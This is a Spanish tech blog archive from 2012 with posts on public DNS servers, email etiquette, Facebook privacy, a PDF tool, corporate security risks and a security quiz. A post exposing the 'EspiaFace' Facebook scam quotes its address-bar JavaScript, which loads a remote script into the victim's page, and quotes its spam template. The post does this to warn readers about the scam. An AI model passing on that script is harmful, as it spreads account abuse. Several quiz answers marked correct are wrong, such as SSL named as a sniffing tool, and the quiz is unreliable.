martes, 18 de diciembre de 2012

DNS publicos como alternativa para uso doméstico

El servicio de DNS es el que le permite a la computadora traducir los nombres de dominio a direcciones IP. Generalmente, es el proveedor de Internet quien provee los servidores DNS, como así también en las redes suelen contar con servidores propios. Pero muchas veces debido a la calidad del servicio brindado (interrupciones en el servicio, filtrado de contenidos, lentitud) uno puede querer cambiarlo. Para ello tenemos algunas opciones gratuitas y muy buenas:
  1. OpenDNS: es el servicio más popular, que ya ha alcanzado al 1% de los usuarios de Internet y es la primer referencia obligada en este campo. Servidores: 208.67.222.222 y 208.67.220.220.
  2. Google Public DNS: Desde 2009 en servicio , y con un tiempo de respuesta aceptable: Servidores: 8.8.8.8 y 8.8.4.4.
  3. ScrubIT: el servicio se caracteriza por filtrar sitios con contenido pornográfico, phishing u otros contenidos maliciosos. Recomendado para entornos corporativos o familias que quieran filtrar dichos contenidos. Servidores: 67.138.54.100 y 207.225.209.66.
  4. DNS Advantage: otro servicio del mismo tipo que he probado y también funciona correctamente. Servidores: 156.154.70.1 y 156.154.71.1.
  5. Norton DNS: el servicio es provisto por la popular empresa de seguridad Symantec, aunque vale destacar que aún se encuentra en estado beta.  También ofrece filtrado de sitios maliciosos. Servidores: 198.153.192.1 y 198.153.194.1.
Aunque al principio los DNS públicos no eran tan utilizados, se puede decir que hoy en día tienen todos un muy buen rendimiento y para muchos son una alternativa de uso diario con excelente satisfacción por el servicio brindado.

martes, 9 de octubre de 2012

10 Reglas del buen uso del correo electrónico

O tambien reglas de etiqueta que se sugiere para el uso del correo electrónico. ¿Cuantas aplicas tu?

  •  Asunto .- Utilice un tema que sea significativo para el receptor, así como a ti mismo. La primero que verá la gente es el tema de cualquier correo electrónico que entren en su bandeja de entrada lo que determinará si va a abrirlo o ignorarlo. Su correo electrónico debe tener un tema que alerta al receptor a su contenido, escrito con una capitalización adecuada, gramática, etc.

  • Formato.- Déle formato a su correo electrónico para facilitar la lectura. Un formato que es de uso extendido por su claridad y sencillez es el siguiente: Normal negro, 10pt 12pt  fuente predeterminada de plantilla. Sólo imágenes corporativas se debe permitir el exterior para hacer una impresión y contribuir al reconocimiento de nuestra imagen de marca. 

  • Sea conciso y preciso. No redacte un e-mail más hallá de lo que tiene que ser. Recuerde que en lo que respecta a lectura de las comunicaciones, un e-mail es más tedioso que la lectura impresa y un e-mail largo resulta muy desalentador para leer. Se recomienda ser breve, claro y directo sin llegar a ser descortés en el trato
  • No adjuntar archivos innecesarios. El envío de adjuntos de gran tamaño puede molestar a los clientes e incluso ralentizar su sistema de correo electrónico. Siempre que sea posible tratar de comprimir archivos adjuntos y sólo enviar archivos adjuntos cuando son productivas. Considere la posibilidad de no enviar adjuntos de gran tamaño durante el fin de semana cuando la persona no será capaz de controlar su tamaño la capacidad de bandeja de entrada.
  • No escriba en MAYÚSCULAS. Si se escribe en mayúsculas, proporciona la percepción de que usted está gritando. Esto puede ser muy molesto y podría desencadenar una respuesta no deseada en forma de un correo electrónico de nuestro destinatario.
  • No reenvíes cadenas. Podemos afirmar que todos ellos son engaños. Simplemente elimine las cartas tan pronto como los reciba, o mejor aun pídale a ese contacto que evite incluirlo en ese tipo de mails que resultan ociosos.  
  • No haga uso excesivo de "Responder a todos". Utilice sólo Responder a todos si realmente necesitamos su mensaje para ser vistos por cada persona que recibió el mensaje original.
  • Utilice ortografía, gramática y puntuación. Esto no sólo es importante porque la ortografía incorrecta, la gramática y la puntuación dar una mala impresión de su empresa, también es importante para transmitir el mensaje correctamente. E-mails sin puntos ni comas son difíciles de leer y, a veces puede incluso cambiar el significado del texto. Por otro lado se ha hecho de uso extendido el lenguaje de Mensaje de texto, el cual aparte de ser una aberración del idioma, demuestra una clara falta de respeto.
  • Sea Cortes. Es importante que siempre incluyen un saludo, así como una señal de buenos modales en todas sus correos electrónicos. Por ejemplo: Hola, Hola Tom, gracias de nuevo, buen día, gracias, Atentamente, Recuerdos o Espero oír de usted pronto.
  • Responda rápidamente. Los clientes enviar un e-mail porque desean recibir una respuesta rápida. Por lo tanto, cada e-mail debe recibir respuesta en un plazo de al menos 24 horas y preferiblemente en el mismo día de trabajo. Si el correo electrónico es complicado, basta con enviar un mensaje por correo electrónico diciendo que lo ha recibido y que se pondrá en contacto con ellos. Esto dará tranquilidad al cliente y logrará que sea más paciente

10 importantes razones para no tener cuenta en Facebook

Replica de este articulo, de lectura recomendada:

Facebook es la red social más importante del mundo, su negocio no es cobrarles a los usuarios por usar la red o tener sus fotos colgadas en internet. Su negocio son los datos de sus usuarios y mientras más datos tengan de nosotros es mejor para ellos.
Tomando en cuenta eso, uno debería temerle a esta red social sobre que puede hacer con tus datos, peor con su wall donde la gente escribe que hace, come, mira, escucha, baja, etc.…
Todo eso lo pensó Dan Yoder que explica el porque decidió borrar su cuenta de Facebook he hizo las 10 razones del porque borrar la cuenta de esa red social las cuales traduzco del post original:

10.- Los términos del servicio benefician solo a Facebook

Los términos del servicio de Facebook es ese montón de letras pequeñas que salen cuando creas tu cuenta y uno al confiar en ellas simplemente le hace click a ACEPTO.
Pues bien en esos términos de servicio el único beneficiado es Facebook, haciendo el cambio en enero de este año. Según la sección 2.1 dice que no solo ellos son propietarios de tu información, entonces aparte de Facebook quién más puede saber que hago,como, miró, escucho o bajo? La sección 4.6 dice que si tu no tienes tu información exacta y al día ellos puedes borrar tu cuenta (sección 14).  Como ven esos términos son para proteger el negocio de Facebook y no tienen ningún sentido para el usuario.
Para ponerlo más sencillo y claro, Facebook ve a sus usuarios como empleados no pagados y son utilizados como método de
estudio publicitario para las empresas.

9.- El creador de Facebook tiene un pasado poco ético
Desde el principio de Facebook hay dudas acerca de la ética de Zuckerberg. Según BusinessInsider.com , utilizó datos de usuarios de Facebook  para entrar a sus cuentas de correo, leer sus correos y así desacreditar a sus rivales. Estas afirmaciones hechas por BusinessInsider.com dejan que pensar sobre el CEO. Estas alegaciones se hacen más convincentes después de que TechCrunch hiciera público un documento donde Facebook habría pagado $65 millones de dólares a ConnectU para terminar una demanda hecha por ConnectU, donde aseguraban que Facebook
les había robado la idea de manera desleal.

8.- Facebook está en contra de la privacidad

Zuckerberg siempre ha sido defensor de la no privacidad, en enero pasado después del cambio de los cambios de política de privacidad escribió: ¨ La gente está realmente cómoda no solo compartiendo mas información y de diferentes tipos, de forma más abierta y con más gente. Esa norma social es sólo algo que ha evolucionado con el tiempo.¨ Más recientemente con la introducciónde Open Graph la omisión es ahora social¨
Eso significa que Facebook no solo quiere saber de ti, y de tus datos propios, sino que además quiere ponerlos a disposición de todo el mundo.  Lo cual no seria una falta ética, si no fuese porque…

7.- Facebook es peor que Twitter

Cambie el título de está razón porque creo que es más sencillo de explicar así. Bueno, mientras Facebook le dice a los desarrolladores como acceder a tus datos, ellos no se preocupan en dar explicaciones a las implicaciones que esto podría tener.  Esto es como una trampa para ambos, ya que tu crees que tu información está más segura en Facebook que en otras redes sociales como Twitter, pero en realidad Facebook hace pública tu información a los desarrolladores y empresas de publicidad.
Es por eso que Facebook es peor que Twitter, porque Twitter solo ha hecho más simple (y creíble) la forma en que compartimos nuestra información, empezando que en Twitter tu sabes que todo lo que escribes es público. Es por eso que involucran al FTC (la comisión que protege al consumidor) y las personas están demando a Facebook por la privacidad (y ganan las demandas)
Pueden ver una pequeña lista de cambios de política de privacidad hechas desde que se inicio la red social.
6.- Facebook es un abusivo
Cuando Pete Warden demostró como rastrear los datos de la configuración de privacidad de Facebook (cambios que había hecho sin darse cuenta) Facebook lo demandó.  Esto sucedió justo antes de que la API de Open Graph se diera a conocer y Zuckerberg escribiera ¨es ahora social¨. Porque demandar a un desarrollador de software? por qué demandar a una persona que estaba trabajando en un programa que tomara todos los datos para hacerlos más sociables, si eso mismo hizo Facebook con Open Graph? Pues Facebook no quiere dar a conocer la cantidad de datos que es posible tomar de esa API. Una cosa es hablar con los desarrolladores acerca de lo grande que va ser compatir, y otra muy diferente que otro vea lo que realmente significa, archivarlos y dejar que todo el mundo se lo descarge.
5.- Hasta tus datos privados son compartidos con las aplicaciones
Llegamos al punto de que todos tus datos son compartidos con las aplicaciones que tú instalas. Lo que significa que ahora no solo confías en Facebook, sino que también en los desarrolladores de aplicaciones que muchas veces son muy pequeños y no se preocupan mucho acerca de la seguridad de tus datos. Eso significa que todos tus datos se deben considerar públicos, a menos que tu simplemente nunca uses ninguna aplicación de Facebook. Junto ahora con OpenGraph, tu ahora no solo confías en Facebook sino en el ecosistema creado por ellos.
4.- Facebook no es técnicamente competente como para ser de confianza
Incluso si no estuviéramos hablando sobre tu ética, uno no puede confiar en Facebook para asegurarse que nuestros datos no serán robados. Por ejemplo, su reciente introducción del botón ¨Me gusta¨ hace más fácil a los spammers obtener acceso a mi feed y espamiar mi red social.
Aparte que ellos han tenido una serie de errores técnicos, como el accidental error que puso todos los perfiles de sus usuarios públicos o el agujero que tomo 2 semanas en ser arreglado. Ellos no se preocupan mucho de tu privacidad o no tienen buenos ingenieros o ambos.
3.- Facebook hace increíblemente dificultoso borrar tu cuenta
Bueno llegamos al punto que ta nos convencimos que Facebook no es nada seguro, así que ahora queremos borrar nuestra cuenta… aunque eso no será nada fácil.
Ellos nunca prometen acerca de borrar todos tus datos y los datos que dejaste en cada aplicación por ejemplo. Pero lo peor de todo es que borrar tu cuenta de Facebook es increíblemente confuso (y lo hacen a propósito). Cuando tu vas a tu configuración de cuenta, hay una opción de desactivar tu cuenta,  que no es lo mismo que borrar tu cuenta. Desactivar significa que tu vas a seguir etiquetado en Facebook y recibirás spam de Facebook, de ahí cuando lo vuelvas a reactivar todo volverá como lo habías dejado, es decir que es lo mismo dejar de logearse a Facebook que desactivar tu cuenta.
Para realmente borrar tu cuenta de Facebook, primero debes hacer 5 clics antes de ir a la página de borrar tu cuenta (o puedes hacer 1 click aquí). Simplemente Facebook hace difícil que borres tu cuenta para que no lo hagas.
Tip: Un usuario de CristaLab hizo un tutorial de como borrar por completo tu cuenta de Facebook, aunque el mismo advierte que no es 100% seguro.
2.- Facebook realmente no apoya la web abierta
Entonces el llamado Open Graph no es tan abierta como su nombre lo dice, ya que fundamentalmente estás en una naturaleza cerrada. Ya es bastante malo la idea que entre todos nos ayudamos para que Facebook conozca más datos de nosotros. Ya es bastante malo que la mayoría de usuarios no sepa que los datos de Facebook son públicos. Ya es bastante malo que Facebook diga poseer esa información para ellos solos. Entonces eso de ¨Open¨ no tiene nada cuando en realidad es totalmente propietario de Facebook. El no poder utilizar esa característica si no estás en Facebook. Para que Open Graph sea realmente abierto debería de poder usarse en cualquier red social, una opción como OpenID  o OpenLike que son realmente abiertos y no te empujan a un ecosistema cerrado como el de Facebook Connect.
1.- Facebook realmente no sirve para nada
Entre mi granja y Mafia wars y las ¨top news¨, la configuración de privacidad y los anuncios molestosos (que poseen todos mis datos por eso saben que estoy soltero y me muestran páginas de citas) las miles y miles de aplicaciones basuras, Facebook es casi completamente inútil para uno. Si tal vez se podría adaptarse mejor, una mejor navegación, con la opción de configurarlo sin que moleste. La lentitud de la página cuando cargas tu wall por todos ¨Quiz¨ que tus amigos te han mandado, muchas veces sin que ellos se enteren, bueno en ese momento Facebook se volvió molestoso en vez de necesario.
Facebook claramente quiere ser el rey y siempre tratan de agregar características de otras redes adaptadas a la de ellos. Cosa que Twitter no hace, ya que solo se centran en una cosa y no tratan de ser para todo el mundo.
Facebook es una moda y eso Zuckerberg lo sabe y no quiere que eso pase, por eso todos esos cambios y cosas que sacan, pero como saben hasta las redes más grandes y prometedoras pueden caer (así como le paso a MySpace)
Todo eso puede cambiar es solo que te animes a dar el salto. click.
Un post escrito originalmente por Dan Yoder para Rocket.ly
Traducido y adaptado por msakiya para http://mix.pe
 

martes, 17 de julio de 2012

I Love PDF

Solo para ser breve: IlovePDF
Una herramienta online muy interesante: la posibilidad de partir o unir, uno o varios pdfs:


 Características para Unir PDF en la versión gratuita:
  • Total máximo de tamaño de todos los PDFS: 80 Mb
  • Total máximo de archivos: 10
 Características para partir PDF en la versión gratuita:
  • Tamaño máximo del PDF: 10 Mb
  • Total máximo de archivos a partir: 10
Otro detalle importante es que los archivos resultantes están en links cuya duración en la versión gratuita es de 60 minutos.


lunes, 2 de julio de 2012

Averigua quien visita tu perfil en Facebook es un fraude (De Techtastico)

Considero importante reproducir este articulo para los Fan Facebook que conozco:
Desde hace unos días se ha propagado en rápidamente en Facebook una supuesta manera de saber quien ha visitado tu perfil, el supuesto servicio viene un sitio fraudulento llamado EspiaFace.com, que aquí vamos a desenmascarar, pues cómo ya había comentado hace tiempo que todas las aplicaciones que te prometen saber quien ha visitado tu perfil en Facebook son una estafa esta nueva aplicación no es la excepción.
Viendo cómo funciona el servicio de EspiaFace.com te pide hacer una serie de cosas para supuestamente instalar el servicio en tu cuenta, para eso tienes que insertar un código en tu muro que tal vez muchos no entienden pero se trata de un simple JavaScript que toma de manera aleatoria algunos de tus amigos de tu cuenta y los coloca con un número de visitas ya predefinido.

El primero código que te pide insertar en la barra de direcciones es el siguiente:
javascript:(a=(b=document).createElement('script')).src='//app.espiaface.com/app.js?'+Math.random(),b.body.appendChild(a);void(0)
En el código anterior lo único que hace es agregar el script de espiaface.com a tu Facebook para poder sacar los nombres de tus amigos.
Después te pide compartir el sitio en tu Facebook, supuestamente para que funcione, esto es lo más bajo que he visto para engañar a un usuario, aquí el único objetivo es propagar el fraude.
Y si lo anterior no fue suficiente te pide llenar una encuesta con la que los dueños del servicio ganan dinero, de nuevo engañando al usuario y si no completas la encuesta no podrás terminar, así que todos los que han caido en el fraude han llenado la encuesta.
Finalmente nos pide publicar el siguiente código en nuestro Facebook:
var postmessage = 'Top de visitantes de tu perfil de hoy:
%tf% - 19 visitas
%tf% - 16 visitas
%tf% - 15 visitas
%tf% - 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!';

En el código anterior lo que dice %tf% es donde se colocan de manera aleatoria nombre de tus amigos que se etiquetan en el mensaje, esto lo puedes comprobar haciendo varias veces el mismo procedimiento, donde siempre van a aparecer nombres diferentes y el mismo número de visitas.
Cómo puedes ver, si sabes algo de JavaScript, puedes ver que el supuesto servicio es un fraude total, y lo peor, es que miles de personas en Facebook creen que es verdad y están etiquetando a sus amigos para propagar el fraude.
Así que si tu también fuiste víctima de ser etiquetado por alguno de tus amigos como uno de los que más visitan su perfil cuando ni siquiera es verdad, comparte este este artículo con ellos para que no crean ese engaño.
Articulo Original: http://techtastico.com/post/espiaface.com-fraude/

viernes, 1 de junio de 2012

¿Cuales son los problemas de seguridad corporativa más críticos?
Este tema puede ser no solo uno de los más críticos sino también lo que mayor planificación y costos requieran.
Es posible tambien que los aquí enumerados no sea la realidad de toda empresa pero en su mayoría son problemas repetitivos y dignos de ser considerados:

1.-  Los usuarios internos
A veces la mayor fuente de riesgos de seguridad de manera deliberada o no, pues son los que manejan la información de la compañía todo el tiempo. Gastamos un montón de esfuerzo de preocuparse por las amenazas externas, pero con toda honestidad, todo lo se que necesita es una memoria USB infectada con algun malware la cual trajo un empleado de su casa para anular todos los servidores de seguridad. Los empleados descontentos a veces expresan su cólera haciendo daño a sus sistemas informáticos. Y, por supuesto, es posible para un empleado bien intencionado de hacer un gran error. Soluciones: concientización, la configuración (y cumplir) las políticas, y sabiendo que sus empleados son sus mejores pasos para cerrar los agujeros aquí.
2.-  Maquinas no autorizadas
Es triste decir que este es un problema que a veces parte de la misma gente de IT, al montar servicios en equipos antiguos, sea para testing o para cualquier cosa y que por el hecho de ser un equipo viejo no estará directamente en producción. Debido a ello muchas veces no se le da relevancia a parcharlo o establecer la seguridad del caso en estos equipos más aun cuando corren servicios, sea Web, FTP, DNS etc. Lo mejor recomendable aquí sería implementar auditorías de direcciones IP y el monitoreo respectivo de tal manera que permita crear una lista de las máquinas. Si las máquinas no pueden obtener direcciones IP, entonces no son riesgo a considerar.
3.- Vulnerabilidades comunes 
SQL Injection y XSS son vulnerabilidades que a pesar de ser tan conocidas se esperaría que no fuese común, sin embargo la realidad es otra. Aun se ve estos casos es cierto que es difícil cambiar el software una vez que se ha instalado o puesto en producción pero eso no quita el hecho de que es vital mantener estos paquetes al día, aunque es bastante complicado.
4.- Administradores Locales
No es dificil imaginar a un empleado poco "tech-geek" con los privilegios más elevados que el sistema operativo permite. El resultado puede ser catastrófico. Mucha gente de IT eleva a administrador a sus usuarios con fines de prueba o de realizar un mantenimiento y el problema se da cuando olvidan retirar dichos privilegios. Solución: Es mejor que el personal de IT use las herramientas de administración centralizada en lugar de elevar privilegios a los usuarios. Yo personalmente evito esta práctica, teniendo el "run as" como elemento de apoyo en dichas tareas. 
5.- Permisos de compartidos y/o archivos incorrectos
Los permisos de archivos son cosas delicadas, y la mayoría de los usuarios ni siquiera son conscientes de cómo usarlos correctamente. Entonces, ¿qué sucede? Los usuarios pueden crear archivos confidenciales en su ubicación habitual en red y los archivos de obtener los permisos predeterminados, que son "colaboración amistosa" por decir lo menos. Lo siguiente que sé, todo el mundo puede leer los documentos, que se supone que son confidenciales. La mejor arma es para pre-establecer una acción y la estructura de archivos con los permisos adecuados. Por ejemplo, dar a cada uno un directorio home para los documentos personales y crear acciones o directorios alrededor de los roles, proyectos, y los equipos con los permisos adecuados. La parte difícil es educar a continuación, a utilizar las ubicaciones correctas - pero eso es mucho más fácil que tratar de enseñar a los permisos. En resumen, esta tarea planificada debe estar a manos de IT bajo un estándar de trabajo
6.- Servidores antiguos
En un rincón de tu datacenter puede todavía estar aquel viejo servidor que ya no está en producción pero sigue corriendo servicios básico y que por tener un S.O. antiguo, viene con vulnerabilidades inherentes cuyos parches ya no fueron publicados ni diseñados jamás o que no se le aplica para evitar la interrupción de algun servicio. Ese es un gran hueco en la seguridad de la red, solución: Reemplazo sí o sí. un buen primer paso es la virtualización si el impase es presupuestal.

7.- Aplicaciones antiguas
No son sólo los servidores antiguos que son los grandes riesgos de seguridad, sino también las aplicaciones que se ejecutan en ellos, así como otras aplicaciones antiguas que es posible que se estén ejecutando. Estas aplicaciones sería mucho menos problemática si estuvieran al día con sus parches, pero por lo general no lo son. Con demasiada frecuencia, perdemos una importante actualización de la versión debido a que la actualización es tan difícil, y entonces lo dejamos de lado tan solo porque es imposible ponerse al día. O tal vez las aplicaciones están completamente descontinuada. Es doloroso decirlo, pero la mejor cosa que puedes hacer es encontrar una ruta de migración a una versión más reciente o otro paquete completo.

8.- Deshabilitación de la seguridad 

A veces las politicas de seguridad pone obstáculos para realizar el trabajo, por lo que la "respuesta lógica" de muchos usuarios es encontrar una manera de trabajar por encima de ella. Por ejemplo, he visto a personas establecidas anonimizadores en el país para dejar de lado las políticas. Los usuarios avanzados (especialmente a los desarrolladores y administradores de sistemas) a menudo saben cómo eludir las herramientas de seguridad. También pueden ser los administradores locales a causa de una necesidad técnica, lo que hace el deshabilitando cierto software de seguridad y cambiar la configuración sea aún más fácil.

La lucha contra esto es difícil debido a que estos usuarios a menudo asumen que son "demasiado inteligente" para ser un riesgo para la seguridad. Lo que no se dan cuenta es que la "granja" actual de las amenazas de seguridad no requieren que el usuario comete un error, como ir a un sitio web sospechoso, obviamente, o la descarga de software pirateado. Cada archivo Acrobat, por ejemplo, puede convertirse en una plaga potencial en este punto. Comience a buscar tendencias poco usuales, como una gran cantidad de tráfico constante a una dirección IP y utilizar las herramientas centralizadas para asegurar que los valores están en los niveles adecuados y se reponen periódicamente. Además, tenga todos los derechos innecesarios de las administraciones locales y grupos de todo el servidor de seguridad en su propio segmento de red para limitar el daño si esos grupos tienen una necesidad legítima de menor seguridad.

viernes, 9 de marzo de 2012

Quiz sobre seguridad

¿Cómo se le llama al virus capaz de cambiar la secuencia de bytes en cada infección para evitar ser detectado por las aplicaciones antivirus? : Respuesta correcta!
    Tu respuesta:
  • c. Virus Polimorphe
  • La respuesta correcta es:
  • c. Virus Polimorphe
¿Qué tipo de virus es capaz de controlar nuestro ordenador de forma remota? : Respuesta correcta!
    Tu respuesta:
  • b. Un troyano
  • La respuesta correcta es:
  • b. Un troyano
Verdadero o falso. El sistema operativo Windows es más seguro que Linux : Respuesta correcta!
    Tu respuesta:
  • b. Falso
  • La respuesta correcta es:
  • b. Falso
¿Cómo se le denomina a la técnica que utilizan los virus para esconderse de los software antivirus? : Respuesta correcta!
    Tu respuesta:
  • b. Rootkit
  • La respuesta correcta es:
  • b. Rootkit
¿Cuál es la función de un firewall? : Respuesta correcta!
    Tu respuesta:
  • a. Bloquear conexiones no autorizadas
  • La respuesta correcta es:
  • a. Bloquear conexiones no autorizadas
¿Para qué sirve el método de hacking denominado ‘social engineering’? : Respuesta correcta!
    Tu respuesta:
  • a. Para encontrar datos confidenciales sin la necesidad de usar un virus
  • La respuesta correcta es:
  • a. Para encontrar datos confidenciales sin la necesidad de usar un virus
¿Cuál es el nombre del lenguaje utilizado por los hackers para encontrar vulnerabilidades de seguridad en portales de Internet? : Respuesta correcta!
    Tu respuesta:
  • c. XSS
  • La respuesta correcta es:
  • c. XSS
¿En qué lenguaje están programados los virus Batch habitualmente? : Respuesta errónea!
    Tu respuesta:
  • a. BASIC
  • La respuesta correcta es:
  • c. MS-DOS
¿Con qué nombre se denomina al contenido legal que se distribuye de forma ilegal por Internet? : Respuesta correcta!
    Tu respuesta:
  • c. Warez
  • La respuesta correcta es:
  • c. Warez
¿Qué tipo de compañías envían spyware capaces de recopilar datos? : Respuesta correcta!
    Tu respuesta:
  • a. Empresas de publicidad
  • La respuesta correcta es:
  • a. Empresas de publicidad
¿Qué herramienta se usa para contar el ‘sniffing’ u olfateo, la técnica que es capaz de identificar datos como las contraseñas? : Respuesta correcta!
[caption id="attachment_10214" align="alignnone" width="185" caption="Twitter es la red social ideal para distribuir falsos antivirus gracias a los acortadores de direcciones"][/caption]
    Tu respuesta:
  • c. Un protocolo de encriptación de información (SSL)
  • La respuesta correcta es:
  • c. Un protocolo de encriptación de información (SSL)
Del total de los correos electrónicos que se envían por todo el mundo, ¿qué porcentaje es spam? : Respuesta correcta!
    Tu respuesta:
  • a. 90%
  • La respuesta correcta es:
  • a. 90%
¿Cuál es la técnica usada en el ‘Nigerian Spam’ también llamada ‘Fraude 491’, toda una categoría de spam? : Respuesta errónea!
[caption id="attachment_15068" align="alignnone" width="185" caption="La página utiliza el logotipo de la BBC para ganarse la confianza de los usuarios"][/caption]
    Tu respuesta:
  • a. La venta falsa de medicamentos que hacen referencia al rendimiento sexual
  • La respuesta correcta es:
  • c. Engañando a los usuarios para que entreguen dinero con la promesa de que recibirán grandes sumas de dinero a cambio
Verdadero o falso. La mayoría de los hackers se definen como piratas en el mundo digital. : Respuesta correcta!
    Tu respuesta:
  • b. Falso
  • La respuesta correcta es:
  • b. Falso
¿Qué es el phishing? : Respuesta errónea!
    Tu respuesta:
  • b. Un intento de conseguir información personal mostrando ser alguien de confianza
  • La respuesta correcta es:
  • c. Una técnica que recopila información de usuarios sin que estos sean conscientes de ello